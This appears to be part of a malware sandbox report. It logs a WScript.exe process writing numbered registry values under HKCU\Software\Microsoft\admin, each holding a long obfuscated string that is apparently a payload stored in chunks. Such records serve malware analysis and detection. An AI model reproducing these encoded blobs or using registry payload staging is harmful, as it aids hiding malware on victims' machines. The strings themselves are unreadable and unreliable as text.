vrvvtwdrtwcsffwudwfevrvvpucvouviffwufofcvrvvtwdrtwcsffwubdfevrvvpucvouviffwuetfcvrvvtwdrtwcsffwuasfevrvvpucvouviffwucffcvrvvtwdrtwcsffwusufevrvv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:3
Value:
pucvouviffwubbfcvrvvtwdrtwcsffwupwfevrvvpucvouviffwuaofcvrvvtwdrtwcsffwuidfevrvvpucvouviffwustfcvrvvtwdrtwcsffwuusfevrvvpucvouviffwuoffcvrvvtwdrtwcsffwuyufevrvvpucvouviffwuibfcvrvvtwdrtwcsffwutwfevrvvpucvouviffwuuofcvrvvtwdrtwcsffwuwdfevrvvpucvouviffwuytfcvrvvtwdrtwcsffwuvsfevrvvpucvouviffwurffcvrvvtwdrtwcsffwufufdvrvvpucvouviffwuwbfcvrvvtwdrtwcsffwuewfdvrvvpucvouviffwuvofcvrvvtwdrtwcsffwucdfdvrvvpucvouviffwuftfbvrvvtwdrtwcsffwubsfdvrvvpucvouviffwudffbvrvvtwdrtwcsffwuaufdvrvvpucvouviffwucbfbvrvvtwdrtwcsffwuswfdvrvvpucvouviffwubofbvrvvtwdrtwcsffwuodfdvrvvpucvouviffwuatfbvrvvtwdrtwcsffwuisfdvrvvpucvouviffwupffbvrvvtwdrtwcsffwuuufdvrvvpucvouviffwuobfbvrvvtwdrtwcsffwuywfdvrvvpucvouviffwuiofbvrvvtwdrtwcsffwurdfdvrvvpucvouviffwuutfbvrvvtwdrtwcsffwuwsfdvrvvpucvouviffwutffbvrvvtwdrtwcsffwuvufdvrvvpucvouviffwurbfbvrvvtwdrtwcsffwufwfcvrvvpucvouviffwuwofbvrvvtwdrtwcsffwuddfcvrvvpucvouviffwuvtfbvrvvtwdrtwcsffwucsfcvrvvpucvouviffwueffavrvvtwdrtwcsffwubufcvrvvpucvouviffwudbfavrvvtwdrtwcsffwuawfcvrvvpucvouviffwucofavrvvtwdrtwcsffwupdfcvrvvpucvouviffwubtfavrvvtwdrtwcsffwuosfcvrvvpucvouviffwusffavrvvtwdrtwcsffwuiufcvrvvpucvouviffwupbfavrvvtwdrtwcsffwuuwfcvrvvpucvouviffwuoofavrvvtwdrtwcsffwutdfcvrvvpucvouviffwuitfavrvvtwdrtwcsffwursfcvrvvpucvouviffwuyffavrvvtwdrtwcsffwuwufcvrvvpucvouviffwutbfavrvvtwdrtwcsffwuvwfcvrvvpucvouviffwurofavrvvtwdrtwcsffwuedfbvrvvpucvouviffwuwtfavrvvtwdrtwcsffwudsfbvrvvpucvouviffwufffsvrvvtwdrtwcsffwucufbvrvvpucvouviffwuebfsvrvvtwdrtwcsffwubwfbvrvvpucvouviffwudofsvrvvtwdrtwcsffwusdfbvrvvpucvouviffwuctfsvrvvtwdrtwcsffwupsfbvrvvpucvouviffwuaffsvrvvtwdrtwcsffwuoufbvrvvpucvouviffwusbfsvrvvtwdrtwcsffwuiwfbvrvvpucvouviffwupofsvrvvtwdrtwcsffwuydfbvrvvpucvouviffwuotfsvrvvtwdrtwcsffwutsfbvrvvpucvouviffwuuffsvrvvtwdrtwcsffwurufbvrvvpucvouviffwuybfsvrvvtwdrtwcsffwuwwfbvrvvpucvouviffwutofsvrvvtwdrtwcsffwufdfavrvvpucvouviffwurtfsvrvvtwdrtwcsffwuesfavrvvpucvouviffwuvffsvrvvtwdrtwcsffwudufavrvvpucvouviffwufbfpvrvvtwdrtwcsffwucwfavrvvpucvouviffwueofpvrvvtwdrtwcsffwuadfavrvvpucvouviffwudtfpvrvvtwdrtwcsffwussfavrvvpucvouviffwubffpvrvvtwdrtwcsffwupufavrvvpucvouviffwuabfpvrvvtwdrtwcsffwuowfavrvvpucvouviffwusofpvrvvtwdrtwcsffwuudfavrvvpucvouviffwuptfpvrvvtwdrtwcsffwuysfavrvvpucvouviffwuiffpvrvvtwdrtwcsffwutufavrvvpucvouviffwuubfpvrvvtwdrtwcsffwurwfavrvvpucvouviffwuyofpvrvvtwdrtwcsffwuvdfavrvvpucvouviffwuttfpvrvvtwdrtwcsffwufsfsvrvvpucvouviffwuwffpvrvvtwdrtwcsffwueufsvrvvpucvouviffwuvbfpvrvvtwdrtwcsffwudwfsvrvvpucvouviffwufofovrvvtwdrtwcsffwubdfsvrvvpucvouviffwuetfovrvvtwdrtwcsffwuasfsvrvvpucvouviffwucffovrvvtwdrtwcsffwusufsvrvvpucvouviffwubbfovrvvtwdrtwcsffwupwfsvrvvpucvouviffwuaofovrvvtwdrtwcsffwuidfsvrvvpucvouviffwustfovrvvtwdrtwcsffwuusfsvrvvpucvouviffwuoffovrvvtwdrtwcsffwuyufsvrvvpucvouviffwuibfovrvvtwdrtwcsffwutwfsvrvvpucvouviffwuuofovrvvtwdrtwcsffwuwdfsvrvvpucvouviffwuytfovrvvtwdrtwcsffwuvsfsvrvvpucvouviffwurffovrvvtwdrtwcsffwufufpvrvvpucvouviffwuwbfovrvvtwdrtwcsffwuewfpvrvvpucvouviffwuvofovrvvtwdrtwcsffwucdfpvrvvpucvouviffwuftfivrvvtwdrtwcsffwubsfpvrvvpucvouviffwudffivrvvtwdrtwcsffwuaufpvrvvpucvouviffwucbfivrvvtwdrtwcsffwuswfpvrvvpucvouviffwubofivrvvtwdrtwcsffwuodfpvrvvpucvouviffwuatfivrvvtwdrtwcsffwuisfpvrvvpucvouviffwupffivrvvtwdrtwcsffwuuufpvrvvpucvouviffwuobfivrvvtwdrtwcsffwuywfpvrvvpucvouviffwuiofivrvvtwdrtwcsffwurdfpvrvvpucvouviffwuutfivrvvtwdrtwcsffwuwsfpvrvvpucvouviffwutffivrvvtwdrtwcsffwuvufpvrvvpucvouviffwurbfivrvvtwdrtwcsffwufwfovrvvpucvouviffwuwofivrvvtwdrtwcsffwuddfovrvvpucvouviffwuvtfivrvvtwdrtwcsffwucsfovrvvpucvouviffwueffuvrvvtwdrtwcsffwubufovrvvpucvouviffwudbfuvrvvtwdrtwcsffwuawfovrvvpucvouviffwucofuvrvvtwdrtwcsffwupdfovrvvpucvouviffwubtfuvrvvtwdrtwcsffwuosfovrvvpucvouviffwusffuvrvvtwdrtwcsffwuiufovrvvpucvouviffwupbfuvrvvtwdrtwcsffwuuwfovrvvpucvouviffwuoofuvrvvtwdrtwcsffwutdfovrvvpucvouviffwuitfuvrvvtwdrtwcsffwursfovrvvpucvouviffwuyffuvrvvtwdrtwcsffwuwufovrvvpucvouviffwutbfuvrvvtwdrtwcsffwuvwfovrvvpucvouviffwurofuvrvvtwdrtwcsffwuedfivrvvpucvouviffwuwtfuvrvvtwdrtwcsffwudsfivrvvpucvouviffwufffyvrvvtwdrtwcsffwucufivrvv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:4
Value:
pucvouviffwuebfyvrvvtwdrtwcsffwubwfivrvvpucvouviffwudofyvrvvtwdrtwcsffwusdfivrvvpucvouviffwuctfyvrvvtwdrtwcsffwupsfivrvvpucvouviffwuaffyvrvvtwdrtwcsffwuoufivrvvpucvouviffwusbfyvrvvtwdrtwcsffwuiwfivrvvpucvouviffwupofyvrvvtwdrtwcsffwuydfivrvvpucvouviffwuotfyvrvvtwdrtwcsffwutsfivrvvpucvouviffwuuffyvrvvtwdrtwcsffwurufivrvvpucvouviffwuybfyvrvvtwdrtwcsffwuwwfivrvvpucvouviffwutofyvrvvtwdrtwcsffwufdfuvrvvpucvouviffwurtfyvrvvtwdrtwcsffwuesfuvrvvpucvouviffwuvffyvrvvtwdrtwcsffwudufuvrvvpucvouviffwufbftvrvvtwdrtwcsffwucwfuvrvvpucvouviffwueoftvrvvtwdrtwcsffwuadfuvrvvpucvouviffwudtftvrvvtwdrtwcsffwussfuvrvvpucvouviffwubfftvrvvtwdrtwcsffwupufuvrvvpucvouviffwuabftvrvvtwdrtwcsffwuowfuvrvvpucvouviffwusoftvrvvtwdrtwcsffwuudfuvrvvpucvouviffwuptftvrvvtwdrtwcsffwuysfuvrvvpucvouviffwuifftvrvvtwdrtwcsffwutufuvrvvpucvouviffwuubftvrvvtwdrtwcsffwurwfuvrvvpucvouviffwuyoftvrvvtwdrtwcsffwuvdfuvrvvpucvouviffwuttftvrvvtwdrtwcsffwufsfyvrvvpucvouviffwuwfftvrvvtwdrtwcsffwueufyvrvvpucvouviffwuvbftvrvvtwdrtwcsffwudwfyvrvvpucvouviffwufofrvrvvtwdrtwcsffwubdfyvrvvpucvouviffwuetfrvrvvtwdrtwcsffwuasfyvrvvpucvouviffwucffrvrvvtwdrtwcsffwusufyvrvvpucvouviffwubbfrvrvvtwdrtwcsffwupwfyvrvvpucvouviffwuaofrvrvvtwdrtwcsffwuidfyvrvvpucvouviffwustfrvrvvtwdrtwcsffwuusfyvrvvpucvouviffwuoffrvrvvtwdrtwcsffwuyufyvrvvpucvouviffwuibfrvrvvtwdrtwcsffwutwfyvrvvpucvouviffwuuofrvrvvtwdrtwcsffwuwdfyvrvvpucvouviffwuytfrvrvvtwdrtwcsffwuvsfyvrvvpucvouviffwurffrvrvvtwdrtwcsffwufuftvrvvpucvouviffwuwbfrvrvvtwdrtwcsffwuewftvrvvpucvouviffwuvofrvrvvtwdrtwcsffwucdftvrvvpucvouviffwuftfwvrvvtwdrtwcsffwubsftvrvvpucvouviffwudffwvrvvtwdrtwcsffwuauftvrvvpucvouviffwucbfwvrvvtwdrtwcsffwuswftvrvvpucvouviffwubofwvrvvtwdrtwcsffwuodftvrvvpucvouviffwuatfwvrvvtwdrtwcsffwuisftvrvvpucvouviffwupffwvrvvtwdrtwcsffwuuuftvrvvpucvouviffwuobfwvrvvtwdrtwcsffwuywftvrvvpucvouviffwuiofwvrvvtwdrtwcsffwurdftvrvvpucvouviffwuutfwvrvvtwdrtwcsffwuwsftvrvvpucvouviffwutffwvrvvtwdrtwcsffwuvuftvrvvpucvouviffwurbfwvrvvtwdrtwcsffwufwfrvrvvpucvouviffwuwofwvrvvtwdrtwcsffwuddfrvrvvpucvouviffwuvtfwvrvvtwdrtwcsffwucsfrvrvvpucvouviffwueffvvrvvtwdrtwcsffwubufrvrvvpucvouviffwudbfvvrvvtwdrtwcsffwuawfrvrvvpucvouviffwucofvvrvvtwdrtwcsffwupdfrvrvvpucvouviffwubtfvvrvvtwdrtwcsffwuosfrvrvvpucvouviffwusffvvrvvtwdrtwcsffwuiufrvrvvpucvouviffwupbfvvrvvtwdrtwcsffwuuwfrvrvvpucvouviffwuoofvvrvvtwdrtwcsffwutdfrvrvvpucvouviffwuitfvvrvvtwdrtwcsffwursfrvrvvpucvouviffwuyffvvrvvtwdrtwcsffwuwufrvrvvpucvouviffwutbfvvrvvtwdrtwcsffwuvwfrvrvvpucvouviffwurofvvrvvtwdrtwcsffwuedfwvrvvpucvouviffwuwtfvvrvvtwdrtwcsffwudsfwvrvvpucvouviffwuffefvrvvtwdrtwcsffwucufwvrvvpucvouviffwuebefvrvvtwdrtwcsffwubwfwvrvvpucvouviffwudoefvrvvtwdrtwcsffwusdfwvrvvpucvouviffwuctefvrvvtwdrtwcsffwupsfwvrvvpucvouviffwuafefvrvvtwdrtwcsffwuoufwvrvvpucvouviffwusbefvrvvtwdrtwcsffwuiwfwvrvvpucvouviffwupoefvrvvtwdrtwcsffwuydfwvrvvpucvouviffwuotefvrvvtwdrtwcsffwutsfwvrvvpucvouviffwuufefvrvvtwdrtwcsffwurufwvrvvpucvouviffwuybefvrvvtwdrtwcsffwuwwfwvrvvpucvouviffwutoefvrvvtwdrtwcsffwufdfvvrvvpucvouviffwurtefvrvvtwdrtwcsffwuesfvvrvvpucvouviffwuvfefvrvvtwdrtwcsffwudufvvrvvpucvouviffwufbeevrvvtwdrtwcsffwucwfvvrvvpucvouviffwueoeevrvvtwdrtwcsffwuadfvvrvvpucvouviffwudteevrvvtwdrtwcsffwussfvvrvvpucvouviffwubfeevrvvtwdrtwcsffwupufvvrvvpucvouviffwuabeevrvvtwdrtwcsffwuowfvvrvvpucvouviffwusoeevrvvtwdrtwcsffwuudfvvrvvpucvouviffwupteevrvvtwdrtwcsffwuysfvvrvvpucvouviffwuifeevrvvtwdrtwcsffwutufvvrvvpucvouviffwuubeevrvvtwdrtwcsffwurwfvvrvvpucvouviffwuyoeevrvvtwdrtwcsffwuvdfvvrvvpucvouviffwutteevrvvtwdrtwcsffwufsefvrvvpucvouviffwuwfeevrvvtwdrtwcsffwueuefvrvvpucvouviffwuvbeevrvvtwdrtwcsffwudwefvrvvpucvouviffwufoedvrvvtwdrtwcsffwubdefvrvvpucvouviffwuetedvrvvtwdrtwcsffwuasefvrvvpucvouviffwucfedvrvvtwdrtwcsffwusuefvrvvpucvouviffwubbedvrvvtwdrtwcsffwupwefvrvvpucvouviffwuaoedvrvvtwdrtwcsffwuidefvrvvpucvouviffwustedvrvvtwdrtwcsffwuusefvrvvpucvouviffwuofedvrvvtwdrtwcsffwuyuefvrvvpucvouviffwuibedvrvvtwdrtwcsffwutwefvrvvpucvouviffwuuoedvrvvtwdrtwcsffwuwdefvrvvpucvouviffwuytedvrvvtwdrtwcsffwuvsefvrvvpucvouviffwurfedvrvvtwdrtwcsffwufueevrvv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:5
Value:
pucvouviffwuwbedvrvvtwdrtwcsffwueweevrvvpucvouviffwuvoedvrvvtwdrtwcsffwucdeevrvvpucvouviffwuftecvrvvtwdrtwcsffwubseevrvvpucvouviffwudfecvrvvtwdrtwcsffwuaueevrvvpucvouviffwucbecvrvvtwdrtwcsffwusweevrvvpucvouviffwuboecvrvvtwdrtwcsffwuodeevrvvpucvouviffwuatecvrvvtwdrtwcsffwuiseevrvvpucvouviffwupfecvrvvtwdrtwcsffwuuueevrvvpucvouviffwuobecvrvvtwdrtwcsffwuyweevrvvpucvouviffwuioecvrvvtwdrtwcsffwurdeevrvvpucvouviffwuutecvrvvtwdrtwcsffwuwseevrvvpucvouviffwutfecvrvvtwdrtwcsffwuvueevrvvpucvouviffwurbecvrvvtwdrtwcsffwufwedvrvvpucvouviffwuwoecvrvvtwdrtwcsffwuddedvrvvpucvouviffwuvtecvrvvtwdrtwcsffwucsedvrvvpucvouviffwuefebvrvvtwdrtwcsffwubuedvrvvpucvouviffwudbebvrvvtwdrtwcsffwuawedvrvvpucvouviffwucoebvrvvtwdrtwcsffwupdedvrvvpucvouviffwubtebvrvvtwdrtwcsffwuosedvrvvpucvouviffwusfebvrvvtwdrtwcsffwuiuedvrvvpucvouviffwupbebvrvvtwdrtwcsffwuuwedvrvvpucvouviffwuooebvrvvtwdrtwcsffwutdedvrvvpucvouviffwuitebvrvvtwdrtwcsffwursedvrvvpucvouviffwuyfebvrvvtwdrtwcsffwuwuedvrvvpucvouviffwutbebvrvvtwdrtwcsffwuvwedvrvvpucvouviffwuroebvrvvtwdrtwcsffwuedecvrvvpucvouviffwuwtebvrvvtwdrtwcsffwudsecvrvvpucvouviffwuffeavrvvtwdrtwcsffwucuecvrvvpucvouviffwuebeavrvvtwdrtwcsffwubwecvrvvpucvouviffwudoeavrvvtwdrtwcsffwusdecvrvvpucvouviffwucteavrvvtwdrtwcsffwupsecvrvvpucvouviffwuafeavrvvtwdrtwcsffwuouecvrvvpucvouviffwusbeavrvvtwdrtwcsffwuiwecvrvvpucvouviffwupoeavrvvtwdrtwcsffwuydecvrvvpucvouviffwuoteavrvvtwdrtwcsffwutsecvrvvpucvouviffwuufeavrvvtwdrtwcsffwuruecvrvvpucvouviffwuybeavrvvtwdrtwcsffwuwwecvrvvpucvouviffwutoeavrvvtwdrtwcsffwufdebvrvvpucvouviffwurteavrvvtwdrtwcsffwuesebvrvvpucvouviffwuvfeavrvvtwdrtwcsffwuduebvrvvpucvouviffwufbesvrvvtwdrtwcsffwucwebvrvvpucvouviffwueoesvrvvtwdrtwcsffwuadebvrvvpucvouviffwudtesvrvvyppdsyryvtvwqvycpdvutcsovrvvbpsdvbqvyppscwyppsdoycpsciftayyppdvdwuaovrvvepippdvrvvtwdrtwcspsctffwuicebvrvvpucvouviffwusresvrvvtwdrtwcsffwuupebvrvvpucvouviffwuoeesvrvvtwdrtwcsffwuyyebvrvvpucvouviffwuiaesvrvvtwdrtwcsffwutvebvrvvpucvouviffwuuiesvrvvtwdrtwcsffwuwcebvrvvpucvouviffwuyresvrvvtwdrtwcsffwuvpebvrvvpucvouviffwureesvrvvtwdrtwcsffwufyeavrvvpucvouviffwuwaesvrvvtwdrtwcsffwueveavrvvpucvouviffwuviesvrvvtwdrtwcsffwucceavrvvpucvouviffwufrepvrvvtwdrtwcsffwubpeavrvvpucvouviffwudeepvrvvtwdrtwcsffwuayeavrvvpucvouviffwucaepvrvvtwdrtwcsffwusveavrvvpucvouviffwubiepvrvvtwdrtwcsffwuoceavrvvpucvouviffwuarepvrvvtwdrtwcsffwuipeavrvvpucvouviffwupeepvrvvtwdrtwcsffwuuyeavrvvpucvouviffwuoaepvrvvtwdrtwcsffwuyveavrvvpucvouviffwuiiepvrvvtwdrtwcsffwurceavrvvpucvouviffwuurepvrvvtwdrtwcsffwuwpeavrvvpucvouviffwuteepvrvvtwdrtwcsffwuvyeavrvvpucvouviffwuraepvrvvtwdrtwcsffwufvesvrvvpucvouviffwuwiepvrvvtwdrtwcsffwudcesvrvvpucvouviffwuvrepvrvvtwdrtwcsffwucpesvrvvpucvouviffwueeeovrvvtwdrtwcsffwubyesvrvvpucvouviffwudaeovrvvtwdrtwcsffwuavesvrvvpucvouviffwucieovrvvtwdrtwcsffwupcesvrvvpucvouviffwubreovrvvtwdrtwcsffwuopesvrvvpucvouviffwuseeovrvvtwdrtwcsffwuiyesvrvvpucvouviffwupaeovrvvtwdrtwcsffwuuvesvrvvpucvouviffwuoieovrvvtwdrtwcsffwutcesvrvvpucvouviffwuireovrvvtwdrtwcsffwurpesvrvvpucvouviffwuyeeovrvvtwdrtwcsffwuwyesvrvvpucvouviffwutaeovrvvtwdrtwcsffwuvvesvrvvpucvouviffwurieovrvvtwdrtwcsffwuecepvrvvpucvouviffwuwreovrvvtwdrtwcsffwudpepvrvvpucvouviffwufeeivrvvtwdrtwcsffwucyepvrvvpucvouviffwueaeivrvvtwdrtwcsffwubvepvrvvpucvouviffwudieivrvvtwdrtwcsffwuscepvrvvpucvouviffwucreivrvvtwdrtwcsffwuppepvrvvpucvouviffwuaeeivrvvtwdrtwcsffwuoyepvrvvpucvouviffwusaeivrvvtwdrtwcsffwuivepvrvvpucvouviffwupieivrvvtwdrtwcsffwuycepvrvvpucvouviffwuoreivrvvtwdrtwcsffwutpepvrvvpucvouviffwuueeivrvvtwdrtwcsffwuryepvrvvpucvouviffwuyaeivrvvtwdrtwcsffwuwvepvrvvpucvouviffwutieivrvvtwdrtwcsffwufceovrvvpucvouviffwurreivrvvtwdrtwcsffwuepeovrvvpucvouviffwuveeivrvvtwdrtwcsffwudyeovrvvpucvouviffwufaeuvrvvtwdrtwcsffwucveovrvvpucvouviffwueieuvrvvtwdrtwcsffwuaceovrvvpucvouviffwudreuvrvvtwdrtwcsffwuspeovrvvpucvouviffwubeeuvrvvtwdrtwcsffwupyeovrvvpucvouviffwuaaeuvrvvtwdrtwcsffwuoveovrvvpucvouviffwusieuvrvvtwdrtwcsffwuuceovrvvpucvouviffwupreuvrvvtwdrtwcsffwuypeovrvvpucvouviffwuieeuvrvvtwdrtwcsffwutyeovrvvpucvouviffwuuaeuvrvvtwdrtwcsffwurv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:6
Value:
eovrvvpucvouviffwuyieuvrvvtwdrtwcsffwuvceovrvvpucvouviffwutreuvrvvtwdrtwcsffwufpeivrvvpucvouviffwuweeuvrvvtwdrtwcsffwueyeivrvvpucvouviffwuvaeuvrvvtwdrtwcsffwudveivrvvpucvouviffwufieyvrvvtwdrtwcsffwubceivrvvpucvouviffwuereyvrvvtwdrtwcsffwuapeivrvvpucvouviffwuceeyvrvvtwdrtwcsffwusyeivrvvpucvouviffwubaeyvrvvtwdrtwcsffwupveivrvvpucvouviffwuaieyvrvvtwdrtwcsffwuiceivrvvpucvouviffwusreyvrvvtwdrtwcsffwuupeivrvvpucvouviffwuoeeyvrvvtwdrtwcsffwuyyeivrvvpucvouviffwuiaeyvrvvtwdrtwcsffwutveivrvvpucvouviffwuuieyvrvvtwdrtwcsffwuwceivrvvpucvouviffwuyreyvrvvtwdrtwcsffwuvpeivrvvpucvouviffwureeyvrvvtwdrtwcsffwufyeuvrvvpucvouviffwuwaeyvrvvtwdrtwcsffwueveuvrvvpucvouviffwuvieyvrvvtwdrtwcsffwucceuvrvvpucvouviffwufretvrvvtwdrtwcsffwubpeuvrvvpucvouviffwudeetvrvvtwdrtwcsffwuayeuvrvvpucvouviffwucaetvrvvtwdrtwcsffwusveuvrvvpucvouviffwubietvrvvtwdrtwcsffwuoceuvrvvpucvouviffwuaretvrvvtwdrtwcsffwuipeuvrvvpucvouviffwupeetvrvvtwdrtwcsffwuuyeuvrvvpucvouviffwuoaetvrvvtwdrtwcsffwuyveuvrvvpucvouviffwuiietvrvvtwdrtwcsffwurceuvrvvpucvouviffwuuretvrvvtwdrtwcsffwuwpeuvrvvpucvouviffwuteetvrvvtwdrtwcsffwuvyeuvrvvpucvouviffwuraetvrvvtwdrtwcsffwufveyvrvvpucvouviffwuwietvrvvtwdrtwcsffwudceyvrvvpucvouviffwuvretvrvvtwdrtwcsffwucpeyvrvvpucvouviffwueeervrvvtwdrtwcsffwubyeyvrvvpucvouviffwudaervrvvtwdrtwcsffwuaveyvrvvpucvouviffwuciervrvvtwdrtwcsffwupceyvrvvpucvouviffwubrervrvvtwdrtwcsffwuopeyvrvvpucvouviffwuseervrvvtwdrtwcsffwuiyeyvrvvpucvouviffwupaervrvvtwdrtwcsffwuuveyvrvvpucvouviffwuoiervrvvtwdrtwcsffwutceyvrvvpucvouviffwuirervrvvtwdrtwcsffwurpeyvrvvpucvouviffwuyeervrvvtwdrtwcsffwuwyeyvrvvpucvouviffwutaervrvvtwdrtwcsffwuvveyvrvvpucvouviffwuriervrvvtwdrtwcsffwuecetvrvvpucvouviffwuwrervrvvtwdrtwcsffwudpetvrvvpucvouviffwufeewvrvvtwdrtwcsffwucyetvrvvpucvouviffwueaewvrvvtwdrtwcsffwubvetvrvvpucvouviffwudiewvrvvtwdrtwcsffwuscetvrvvpucvouviffwucrewvrvvtwdrtwcsffwuppetvrvvpucvouviffwuaeewvrvvtwdrtwcsffwuoyetvrvvpucvouviffwusaewvrvvtwdrtwcsffwuivetvrvvpucvouviffwupiewvrvvtwdrtwcsffwuycetvrvvpucvouviffwuorewvrvvtwdrtwcsffwutpetvrvvpucvouviffwuueewvrvvtwdrtwcsffwuryetvrvvpucvouviffwuyaewvrvvtwdrtwcsffwuwvetvrvvpucvouviffwutiewvrvvtwdrtwcsffwufcervrvvpucvouviffwurrewvrvvtwdrtwcsffwuepervrvvpucvouviffwuveewvrvvtwdrtwcsffwudyervrvvpucvouviffwufaevvrvvtwdrtwcsffwucvervrvvpucvouviffwueievvrvvtwdrtwcsffwuacervrvvpucvouviffwudrevvrvvtwdrtwcsffwuspervrvvpucvouviffwubeevvrvvtwdrtwcsffwupyervrvvpucvouviffwuaaevvrvvtwdrtwcsffwuovervrvvpucvouviffwusievvrvvtwdrtwcsffwuucervrvvpucvouviffwuprevvrvvtwdrtwcsffwuypervrvvpucvouviffwuieevvrvvtwdrtwcsffwutyervrvvpucvouviffwuuaevvrvvtwdrtwcsffwurvervrvvpucvouviffwuyievvrvvtwdrtwcsffwuvcervrvvpucvouviffwutrevvrvvtwdrtwcsffwufpewvrvvpucvouviffwuweevvrvvtwdrtwcsffwueyewvrvvpucvouviffwuvaevvrvvtwdrtwcsffwudvewvrvvpucvouviffwufidfvrvvtwdrtwcsffwubcewvrvvpucvouviffwuerdfvrvvtwdrtwcsffwuapewvrvvpucvouviffwucedfvrvvtwdrtwcsffwusyewvrvvpucvouviffwubadfvrvvtwdrtwcsffwupvewvrvvpucvouviffwuaidfvrvvtwdrtwcsffwuicewvrvvpucvouviffwusrdfvrvvtwdrtwcsffwuupewvrvvpucvouviffwuoedfvrvvtwdrtwcsffwuyyewvrvvpucvouviffwuiadfvrvvtwdrtwcsffwutvewvrvvpucvouviffwuuidfvrvvtwdrtwcsffwuwcewvrvvpucvouviffwuyrdfvrvvtwdrtwcsffwuvpewvrvvpucvouviffwuredfvrvvtwdrtwcsffwufyevvrvvpucvouviffwuwadfvrvvtwdrtwcsffwuevevvrvvpucvouviffwuvidfvrvvtwdrtwcsffwuccevvrvvpucvouviffwufrdevrvvtwdrtwcsffwubpevvrvvpucvouviffwudedevrvvtwdrtwcsffwuayevvrvvpucvouviffwucadevrvvtwdrtwcsffwusvevvrvvpucvouviffwubidevrvvtwdrtwcsffwuocevvrvvpucvouviffwuardevrvvtwdrtwcsffwuipevvrvvpucvouviffwupedevrvvtwdrtwcsffwuuyevvrvvpucvouviffwuoadevrvvtwdrtwcsffwuyvevvrvvpucvouviffwuiidevrvvtwdrtwcsffwurcevvrvvpucvouviffwuurdevrvvtwdrtwcsffwuwpevvrvvpucvouviffwutedevrvvtwdrtwcsffwuvyevvrvvpucvouviffwuradevrvvtwdrtwcsffwufvdfvrvvpucvouviffwuwidevrvvtwdrtwcsffwudcdfvrvvpucvouviffwuvrdevrvvtwdrtwcsffwucpdfvrvvpucvouviffwueeddvrvvtwdrtwcsffwubydfvrvvpucvouviffwudaddvrvvtwdrtwcsffwuavdfvrvvpucvouviffwuciddvrvvtwdrtwcsffwupcdfvrvvpucvouviffwubrddvrvvtwdrtwcsffwuopdfvrvvpucvouviffwuseddvrvvtwdrtwcsffwuiydfvrvvpucvouviffwupaddvrvvtwdrtwcsffwuuv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:7
Value:
dfvrvvpucvouviffwuoiddvrvvtwdrtwcsffwutcdfvrvvpucvouviffwuirddvrvvtwdrtwcsffwurpdfvrvvpucvouviffwuyeddvrvvtwdrtwcsffwuwydfvrvvpucvouviffwutaddvrvvtwdrtwcsffwuvvdfvrvvpucvouviffwuriddvrvvtwdrtwcsffwuecdevrvvpucvouviffwuwrddvrvvtwdrtwcsffwudpdevrvvpucvouviffwufedcvrvvtwdrtwcsffwucydevrvvpucvouviffwueadcvrvvtwdrtwcsffwubvdevrvvpucvouviffwudidcvrvvtwdrtwcsffwuscdevrvvpucvouviffwucrdcvrvvtwdrtwcsffwuppdevrvvpucvouviffwuaedcvrvvtwdrtwcsffwuoydevrvvpucvouviffwusadcvrvvtwdrtwcsffwuivdevrvvpucvouviffwupidcvrvvtwdrtwcsffwuycdevrvvpucvouviffwuordcvrvvtwdrtwcsffwutpdevrvvpucvouviffwuuedcvrvvtwdrtwcsffwurydevrvvpucvouviffwuyadcvrvvtwdrtwcsffwuwvdevrvvpucvouviffwutidcvrvvtwdrtwcsffwufcddvrvvpucvouviffwurrdcvrvvtwdrtwcsffwuepddvrvvpucvouviffwuvedcvrvvtwdrtwcsffwudyddvrvvpucvouviffwufadbvrvvtwdrtwcsffwucvddvrvvpucvouviffwueidbvrvvtwdrtwcsffwuacddvrvvpucvouviffwudrdbvrvvtwdrtwcsffwuspddvrvvpucvouviffwubedbvrvvtwdrtwcsffwupyddvrvvpucvouviffwuaadbvrvvtwdrtwcsffwuovddvrvvpucvouviffwusidbvrvvtwdrtwcsffwuucddvrvvpucvouviffwuprdbvrvvtwdrtwcsffwuypddvrvvpucvouviffwuiedbvrvvtwdrtwcsffwutyddvrvvpucvouviffwuuadbvrvvtwdrtwcsffwurvddvrvvpucvouviffwuyidbvrvvtwdrtwcsffwuvcddvrvvpucvouviffwutrdbvrvvtwdrtwcsffwufpdcvrvvpucvouviffwuwedbvrvvtwdrtwcsffwueydcvrvvpucvouviffwuvadbvrvvtwdrtwcsffwudvdcvrvvpucvouviffwufidavrvvtwdrtwcsffwubcdcvrvvpucvouviffwuerdavrvvtwdrtwcsffwuapdcvrvvpucvouviffwucedavrvvtwdrtwcsffwusydcvrvvpucvouviffwubadavrvvtwdrtwcsffwupvdcvrvvpucvouviffwuaidavrvvtwdrtwcsffwuicdcvrvvpucvouviffwusrdavrvvtwdrtwcsffwuupdcvrvvpucvouviffwuoedavrvvtwdrtwcsffwuyydcvrvvpucvouviffwuiadavrvvtwdrtwcsffwutvdcvrvvpucvouviffwuuidavrvvtwdrtwcsffwuwcdcvrvvpucvouviffwuyrdavrvvtwdrtwcsffwuvpdcvrvvpucvouviffwuredavrvvtwdrtwcsffwufydbvrvvpucvouviffwuwadavrvvtwdrtwcsffwuevdbvrvvpucvouviffwuvidavrvvtwdrtwcsffwuccdbvrvvpucvouviffwufrdsvrvvtwdrtwcsffwubpdbvrvvpucvouviffwudedsvrvvtwdrtwcsffwuaydbvrvvpucvouviffwucadsvrvvtwdrtwcsffwusvdbvrvvpucvouviffwubidsvrvvtwdrtwcsffwuocdbvrvvpucvouviffwuardsvrvvtwdrtwcsffwuipdbvrvvpucvouviffwupedsvrvvtwdrtwcsffwuuydbvrvvpucvouviffwuoadsvrvvtwdrtwcsffwuyvdbvrvvpucvouviffwuiidsvrvvtwdrtwcsffwurcdbvrvvpucvouviffwuurdsvrvvtwdrtwcsffwuwpdbvrvvpucvouviffwutedsvrvvtwdrtwcsffwuvydbvrvvpucvouviffwuradsvrvvtwdrtwcsffwufvdavrvvpucvouviffwuwidsvrvvtwdrtwcsffwudcdavrvvpucvouviffwuvrdsvrvvtwdrtwcsffwucpdavrvvpucvouviffwueedpvrvvtwdrtwcsffwubydavrvvpucvouviffwudadpvrvvtwdrtwcsffwuav